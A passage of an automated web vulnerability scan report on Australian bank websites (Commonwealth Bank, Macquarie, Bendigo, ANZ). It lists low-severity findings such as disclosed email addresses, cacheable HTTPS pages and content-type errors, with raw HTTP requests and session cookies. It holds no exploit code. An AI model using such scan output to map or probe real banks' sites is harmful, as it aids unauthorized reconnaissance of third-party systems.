//MooTools More, <http://mootools.net/more>. Copyright (c) 2006-2009 Aaron Newton <http://clientcide.com/>, Valerio Proietti <http://mad4milk.net> & the MooTools team <http://mootools.net/developers>,
...[SNIP]...
lowed.",dateSuchAs:"Please enter a valid date such as {date}",dateInFormatMDY:'Please enter a valid date such as MM/DD/YYYY (i.e. "12/31/1999")',email:'Please enter a valid email address. For example "fred@domain.com".',url:"Please enter a valid URL such as http://www.google.com.",currencyDollar:"Please enter a valid $ amount. For example $100.00 .",oneRequired:"Please enter something for at least one of these inp
...[SNIP]...

10.4. http://www.commbank.com.au/locate-us/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.commbank.com.au
Path:	/locate-us/

Issue detail

The following email addresses were disclosed in the response:

agline@cba.com.au
localbusinessbanking@cba.com.au

Request

GET /locate-us/ HTTP/1.1
Host: www.commbank.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 118386
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 27 Sep 2011 14:31:46 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_Head1">
...[SNIP]...
<a href="mailto:agline@cba.com.au" target="_blank">agline@cba.com.au</a>
...[SNIP]...
<a href="mailto:localbusinessbanking@cba.com.au" target="_blank">localbusinessbanking@cba.com.au</a>
...[SNIP]...

10.5. https://www.macquarie.com.au/mgl/au/personal/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.macquarie.com.au
Path:	/mgl/au/personal/

Issue detail

The following email address was disclosed in the response:

info@fos.org.au

Request

Response

10.6. https://www.macquarie.com.au/mgl/au/personal/campaigns/superannuation/smsf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.macquarie.com.au
Path:	/mgl/au/personal/campaigns/superannuation/smsf

Issue detail

The following email address was disclosed in the response:

directinvestments@macquarie.com

Request

GET /mgl/au/personal/campaigns/superannuation/smsf HTTP/1.1
Host: www.macquarie.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 14:31:45 GMT
Content-type: text/html; charset=UTF-8
Cache-Control: no-cache
X-Powered-By: Servlet/2.4 JSP/2.0
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<title>Macquarie | SMS
...[SNIP]...
<a href="mailto:directinvestments@macquarie.com">
...[SNIP]...

10.7. https://www.macquarie.com.au/mgl/au/personal/credit-cards previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.macquarie.com.au
Path:	/mgl/au/personal/credit-cards

Issue detail

The following email address was disclosed in the response:

info@fos.org.au

Request

GET /mgl/au/personal/credit-cards HTTP/1.1
Host: www.macquarie.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.8. https://www.macquarie.com.au/mgl/au/personal/error404.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.macquarie.com.au
Path:	/mgl/au/personal/error404.htm

Issue detail

The following email address was disclosed in the response:

info@fos.org.au

Request

Response

10.9. https://www.macquarie.com.au/mgl/au/personal/financial-advice/stockbroking previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.macquarie.com.au
Path:	/mgl/au/personal/financial-advice/stockbroking

Issue detail

The following email address was disclosed in the response:

info@fos.org.au

Request

Response

10.10. https://www.macquarie.com.au/mgl/au/personal/financial-advice/stockbroking/futures previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.macquarie.com.au
Path:	/mgl/au/personal/financial-advice/stockbroking/futures

Issue detail

The following email address was disclosed in the response:

info@fos.org.au

Request

Response

10.11. https://www.macquarie.com.au/mgl/au/personal/financial-advice/strategic-wealth-management previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.macquarie.com.au
Path:	/mgl/au/personal/financial-advice/strategic-wealth-management

Issue detail

The following email address was disclosed in the response:

info@fos.org.au

Request

Response

10.12. https://www.macquarie.com.au/mgl/au/personal/insurance/life-insurance/macquarie-life-active previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.macquarie.com.au
Path:	/mgl/au/personal/insurance/life-insurance/macquarie-life-active

Issue detail

The following email address was disclosed in the response:

info@fos.org.au

Request

Response

10.13. https://www.macquarie.com.au/mgl/au/personal/js/core/mac-libraries.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.macquarie.com.au
Path:	/mgl/au/personal/js/core/mac-libraries.js

Issue detail

The following email addresses were disclosed in the response:

brian@cherne.net
garmand@dfc-e.com
mvilaplana@dfc-e.com

Request

GET /mgl/au/personal/js/core/mac-libraries.js HTTP/1.1
Host: www.macquarie.com.au
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: https://www.macquarie.com.au/mgl/au/personal/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=BDD4123DD58BBE2234B2E6289A4970D4; TS56ffcb=2390808baf1d517ddb61854e0f3693b836824e21333054354e81db99a3a2c207ffffffff60ac0ec563d3f1d9; JSESSIONID=1FGpTBbZvpBm4sfrTbRWLZJscqVzfyj7rmGz9pWryMWdww72Tbvx!344053406; s_cc=true; s_vi=[CS]v1|2740EDCF85010FFB-40000104C038252C[CE]; s_nr=1317133286309; s_sq=mqg-inter-ccir-comau%3D%2526pid%253Dau%2526pidt%253D1%2526oid%253Dhttp%25253A//www.macquarie.com.au/mgl/au/personal%2526ot%253DA; PD_STATEFUL_543a95c9-1a3a-4def-542f-00145e3c444a=%2Fmgl%2Fau%2Fpersonal; TS529c02=e0a150b02758db439940140941aa77aa36824e21333054354e81db99a3a2c207ffffffff60ac0ec51f6c9215e902011a5072448f

Response

HTTP/1.1 200 OK
content-length: 132215
content-type: text/javascript
date: Tue, 27 Sep 2011 14:21:48 GMT
etag: W/"132215-1314586008000"
last-modified: Mon, 29 Aug 2011 02:46:48 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
x-powered-by: Servlet 2.4; JBoss-4.3.0.GA_CP02 (build: SVNTag=JBPAPP_4_3_0_GA_CP02 date=200808051050)/JBossWeb-2.0
x-hp-cam-color: V=1;ServerAddr=cf+Ihuwjl/t8tj3quRifUw==;GUID=1|K4XbXu_TjrYU0ZPoZMItn3vwG1D0tsphyMw2h1fEISPX2gmWNddGiYvhkqpNa40F|L21nbC9hdS9wZXJzb25hbC9qcy9jb3JlL21hYy1saWJyYXJpZXMuanM.

/*! Copyright (c) 2010 Brandon Aaron (http://brandonaaron.net)
* Licensed under the MIT License (LICENSE.txt).
*
* Version 2.1.3-pre
*/

(function($){

$.fn.bgiframe = ($.browser.msie && /msie
...[SNIP]...
<brian@cherne.net>
...[SNIP]...
idth can ensure lines don't sometimes turn over due to slight browser differences in how they round-off values
};

})(jQuery); // plugin code ends
/*
*
* jqTransform
* by mathieu vilaplana mvilaplana@dfc-e.com
* Designer ghyslain armand garmand@dfc-e.com
*
*
* Version 1.0 25.09.08
* Version 1.1 06.08.09
* Add event click on Checkbox and Radio
* Auto calculate the size of a select element
* Can now, disabled the elements
* Correct bug i
...[SNIP]...

10.14. https://www.macquarie.com.au/mgl/au/personal/loans/home-loans previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.macquarie.com.au
Path:	/mgl/au/personal/loans/home-loans

Issue detail

The following email address was disclosed in the response:

info@fos.org.au

Request

GET /mgl/au/personal/loans/home-loans HTTP/1.1
Host: www.macquarie.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.15. https://www.macquarie.com.au/mgl/au/personal/savings-accounts/high-interest-savings-accounts previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.macquarie.com.au
Path:	/mgl/au/personal/savings-accounts/high-interest-savings-accounts

Issue detail

The following email address was disclosed in the response:

info@fos.org.au

Request

Response

10.16. https://www.macquarie.com.au/mgl/au/personal/savings-accounts/term-deposits/term-deposits previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.macquarie.com.au
Path:	/mgl/au/personal/savings-accounts/term-deposits/term-deposits

Issue detail

The following email address was disclosed in the response:

info@fos.org.au

Request

Response

10.17. https://www.macquarie.com.au/mgl/au/personal/search-results previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.macquarie.com.au
Path:	/mgl/au/personal/search-results

Issue detail

The following email address was disclosed in the response:

info@fos.org.au

Request

Response

10.18. https://www.macquarie.com.au/mgl/au/personal/superannuation/self-managed/equity-lever previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.macquarie.com.au
Path:	/mgl/au/personal/superannuation/self-managed/equity-lever

Issue detail

The following email address was disclosed in the response:

info@fos.org.au

Request

Response

10.19. https://www.macquarie.com.au/mgl/au/personal/trading/international-money-transfers/international-money-transfers previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.macquarie.com.au
Path:	/mgl/au/personal/trading/international-money-transfers/international-money-transfers

Issue detail

The following email address was disclosed in the response:

info@fos.org.au

Request

Response

11. Cacheable HTTPS response previous next
There are 12 instances of this issue:

/mgl/au/personal/credit-cards
/mgl/au/personal/error404.htm
/mgl/au/personal/financial-advice/stockbroking
/mgl/au/personal/financial-advice/stockbroking/futures
/mgl/au/personal/financial-advice/strategic-wealth-management
/mgl/au/personal/insurance/life-insurance/macquarie-life-active
/mgl/au/personal/loans/home-loans
/mgl/au/personal/savings-accounts/high-interest-savings-accounts
/mgl/au/personal/savings-accounts/term-deposits/term-deposits
/mgl/au/personal/search-results
/mgl/au/personal/superannuation/self-managed/equity-lever
/mgl/au/personal/trading/international-money-transfers/international-money-transfers

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:

Cache-control: no-store
Pragma: no-cache

11.1. https://www.macquarie.com.au/mgl/au/personal/credit-cards previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.macquarie.com.au
Path:	/mgl/au/personal/credit-cards

Request

GET /mgl/au/personal/credit-cards HTTP/1.1
Host: www.macquarie.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.2. https://www.macquarie.com.au/mgl/au/personal/error404.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.macquarie.com.au
Path:	/mgl/au/personal/error404.htm

Request

Response

11.3. https://www.macquarie.com.au/mgl/au/personal/financial-advice/stockbroking previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.macquarie.com.au
Path:	/mgl/au/personal/financial-advice/stockbroking

Request

Response

11.4. https://www.macquarie.com.au/mgl/au/personal/financial-advice/stockbroking/futures previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.macquarie.com.au
Path:	/mgl/au/personal/financial-advice/stockbroking/futures

Request

Response

11.5. https://www.macquarie.com.au/mgl/au/personal/financial-advice/strategic-wealth-management previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.macquarie.com.au
Path:	/mgl/au/personal/financial-advice/strategic-wealth-management

Request

Response

11.6. https://www.macquarie.com.au/mgl/au/personal/insurance/life-insurance/macquarie-life-active previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.macquarie.com.au
Path:	/mgl/au/personal/insurance/life-insurance/macquarie-life-active

Request

Response

11.7. https://www.macquarie.com.au/mgl/au/personal/loans/home-loans previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.macquarie.com.au
Path:	/mgl/au/personal/loans/home-loans

Request

GET /mgl/au/personal/loans/home-loans HTTP/1.1
Host: www.macquarie.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.8. https://www.macquarie.com.au/mgl/au/personal/savings-accounts/high-interest-savings-accounts previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.macquarie.com.au
Path:	/mgl/au/personal/savings-accounts/high-interest-savings-accounts

Request

Response

11.9. https://www.macquarie.com.au/mgl/au/personal/savings-accounts/term-deposits/term-deposits previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.macquarie.com.au
Path:	/mgl/au/personal/savings-accounts/term-deposits/term-deposits

Request

Response

11.10. https://www.macquarie.com.au/mgl/au/personal/search-results previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.macquarie.com.au
Path:	/mgl/au/personal/search-results

Request

Response

11.11. https://www.macquarie.com.au/mgl/au/personal/superannuation/self-managed/equity-lever previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.macquarie.com.au
Path:	/mgl/au/personal/superannuation/self-managed/equity-lever

Request

Response

11.12. https://www.macquarie.com.au/mgl/au/personal/trading/international-money-transfers/international-money-transfers previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.macquarie.com.au
Path:	/mgl/au/personal/trading/international-money-transfers/international-money-transfers

Request

Response

12. HTML does not specify charset previous next
There are 5 instances of this issue:

http://www.bendigobank.com.au/
http://www.bendigobank.com.au/business/business_finance_loan_dbdetail.asp
http://www.bendigobank.com.au/public/business/business_finance_loan_dbdetail.asp
http://www.bendigobank.com.au/public/business/business_finance_overdraft_dbdetail.asp
http://www.commbank.com.au/thehitlist/

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

12.1. http://www.bendigobank.com.au/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bendigobank.com.au
Path:	/

Request

GET / HTTP/1.1
Host: www.bendigobank.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.google.com/search?aq=f&gcx=c&sourceid=chrome&ie=UTF-8&q=australia+bank
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
p3p: CP="NON CUR OTPi OUR NOR UNI"
last-modified: Wed, 03 Aug 2011 07:55:10 GMT
content-type: text/html
date: Tue, 27 Sep 2011 13:19:15 GMT
age: 3662
content-length: 54

<meta http-equiv="Refresh" content="0;url=./public">

12.2. http://www.bendigobank.com.au/business/business_finance_loan_dbdetail.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bendigobank.com.au
Path:	/business/business_finance_loan_dbdetail.asp

Request

GET /business/business_finance_loan_dbdetail.asp HTTP/1.1
Host: www.bendigobank.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
p3p: CP="NON CUR OTPi OUR NOR UNI"
content-type: text/html
date: Tue, 27 Sep 2011 14:32:35 GMT
x-powered-by: ASP.NET
x-old-content-length: 212
connection: close
cache-control: private

The page you requested has not been found. It may have moved or be otherwise unavailable at this time. If you have accessed this page using a bookmark please return to our home page http://www.bendigo
...[SNIP]...

12.3. http://www.bendigobank.com.au/public/business/business_finance_loan_dbdetail.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bendigobank.com.au
Path:	/public/business/business_finance_loan_dbdetail.asp

Request

GET /public/business/business_finance_loan_dbdetail.asp HTTP/1.1
Host: www.bendigobank.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
p3p: CP="NON CUR OTPi OUR NOR UNI"
content-type: text/html
date: Tue, 27 Sep 2011 14:32:33 GMT
x-powered-by: ASP.NET
x-old-content-length: 212
connection: close
cache-control: private

The page you requested has not been found. It may have moved or be otherwise unavailable at this time. If you have accessed this page using a bookmark please return to our home page http://www.bendigo
...[SNIP]...

12.4. http://www.bendigobank.com.au/public/business/business_finance_overdraft_dbdetail.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bendigobank.com.au
Path:	/public/business/business_finance_overdraft_dbdetail.asp

Request

GET /public/business/business_finance_overdraft_dbdetail.asp HTTP/1.1
Host: www.bendigobank.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.5. http://www.commbank.com.au/thehitlist/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.commbank.com.au
Path:	/thehitlist/

Request

GET /thehitlist/ HTTP/1.1
Host: www.commbank.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 663
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 27 Sep 2011 14:31:49 GMT
Connection: close

<html>
<head>
<title>Commonwealth Bank . The Hit List</title>
<frameset rows="*" border="0" frameborder="0" framespacing="0">
<frame name="main" src="http://hitlist.determinedtobedifferent.com.au/
...[SNIP]...

13. Content type incorrectly stated previous
There are 5 instances of this issue:

http://apps.nowwhere.com.au/analytics/loghandler.ashx
http://australianewzealandb.tt.omtrdc.net/m2/australianewzealandb/mbox/standard
http://www.bendigobank.com.au/business/business_finance_loan_dbdetail.asp
http://www.bendigobank.com.au/public/business/business_finance_loan_dbdetail.asp
http://www.bendigobank.com.au/public/business/business_finance_overdraft_dbdetail.asp

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

13.1. http://apps.nowwhere.com.au/analytics/loghandler.ashx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://apps.nowwhere.com.au
Path:	/analytics/loghandler.ashx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript; charset=utf-8

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /analytics/loghandler.ashx?key=y2X8qJS45oc3MEas513Kg2y3s8XqWR8Oq2112o8m&obj=2&fcb=MapDS.Analytics.CallBacks%5B39002%5D&scb=MapDS.Analytics.CallBacks%5B22845%5D&nocache=1317135250522 HTTP/1.1
Host: apps.nowwhere.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.locate.anz.com/anz/international?r=http://www.anz.com/auxiliary/search/Default.asp?qu=xss&btnSiteSearch=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Tue, 27 Sep 2011 14:53:46 GMT
Content-Type: text/javascript; charset=utf-8
Expires: Mon, 01 Jan 0001 00:00:00 GMT
Server: Microsoft-IIS/6.0
From: Web02
p3p: policyref="/w3c/p3p.xml", CP="NOI DSP CURa ADMa DEVa TAIa OUR NOR IND UNI COM NAV INT"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 35

MapDS.Analytics.CallBacks[22845]();

13.2. http://australianewzealandb.tt.omtrdc.net/m2/australianewzealandb/mbox/standard previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://australianewzealandb.tt.omtrdc.net
Path:	/m2/australianewzealandb/mbox/standard

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /m2/australianewzealandb/mbox/standard?mboxHost=www.anz.com&mboxSession=1317133227582-60217&mboxPage=1317133227582-60217&screenHeight=1200&screenWidth=1920&browserWidth=1087&browserHeight=927&browserTimeOffset=-300&colorDepth=16&mboxCount=2&pageName=personal%3Adefault.asp&hier1=personal%7Cdefault.asp&eVar1=personal&eVar2=personal%3Adefault.asp&eVar8=au&eVar9=en&eVar12=12%3A00AM&eVar13=Wednesday&eVar14=Weekday&eVar26=personal%3Adefault.asp&eVar42=New&prop1=personal&prop2=personal%3Adefault.asp&prop8=au&prop9=en&prop12=12%3A00AM&prop13=Wednesday&prop14=Weekday&prop42=New&mbox=SCtoTnTIntegration&mboxId=0&mboxTime=1317115230225&mboxURL=http%3A%2F%2Fwww.anz.com%2Fpersonal%2F&mboxReferrer=http%3A%2F%2Fwww.google.com%2Fsearch%3Faq%3Df%26gcx%3Dc%26sourceid%3Dchrome%26ie%3DUTF-8%26q%3Daustralia%2Bbank&mboxVersion=40 HTTP/1.1
Host: australianewzealandb.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.anz.com/personal/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 172
Date: Tue, 27 Sep 2011 14:20:14 GMT
Server: Test & Target

mboxFactories.get('default').get('SCtoTnTIntegration',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1317133227582-60217.19");

13.3. http://www.bendigobank.com.au/business/business_finance_loan_dbdetail.asp previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.bendigobank.com.au
Path:	/business/business_finance_loan_dbdetail.asp

Issue detail

The response contains the following Content-type statement:

content-type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /business/business_finance_loan_dbdetail.asp HTTP/1.1
Host: www.bendigobank.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.4. http://www.bendigobank.com.au/public/business/business_finance_loan_dbdetail.asp previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.bendigobank.com.au
Path:	/public/business/business_finance_loan_dbdetail.asp

Issue detail

The response contains the following Content-type statement:

content-type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

13.5. http://www.bendigobank.com.au/public/business/business_finance_overdraft_dbdetail.asp previous

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.bendigobank.com.au
Path:	/public/business/business_finance_overdraft_dbdetail.asp

Issue detail

The response contains the following Content-type statement:

content-type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

Report generated by XSS.CX at Tue Sep 27 10:03:54 CDT 2011.